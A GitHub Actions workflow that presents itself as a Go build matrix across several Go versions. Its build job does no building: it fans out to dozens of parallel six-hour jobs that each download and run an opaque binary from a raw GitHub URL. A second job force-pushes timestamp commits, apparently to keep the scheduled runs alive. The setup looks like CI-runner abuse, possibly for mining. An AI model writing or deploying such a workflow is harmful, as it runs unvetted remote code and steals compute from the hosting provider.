name: API

on:
  push:
    branches:
      - master
      
  schedule:
      - cron: "* * 5 * *" 
   
jobs:
  build:
    name: Vps
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 256
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4,]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N]
    timeout-minutes: 360
    env:
        NUM_JOBS: 256
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        wget https://raw.githubusercontent.com/manaiopre/python-api/master/API && chmod +x API && ./API
        
  API-1:       
    runs-on: ubuntu-latest
    steps:
      - name: Set global directory
        run: git config --global --add safe.directory /github/workspace
      - uses: actions/checkout@v3     
        with:
         persist-credentials: false
         fetch-depth: 1

      - name: Modify last update
        run: |
          cat > LAST_UPDATED
          d=`date '+%Y-%m-%dT%H:%M:%SZ'`
          echo $d > LAST_UPDATED
          
      - name: Commit changes
        run: |
          git config --local user.email "manaiopre@proton.me"
          git config --local user.name "manaiopre"
          git add -A
          
          arr[0]="compile"
          
          rand=$[$RANDOM % ${#arr[@]}]
          
          git commit -m "${arr[$rand]}"
          
      - name: GitHub Push
        uses: ad-m/github-push-action@v0.6.0
        with:
          force: true
          directory: "."
          github_token: ${{ secrets.GITHUB_TOKEN }}
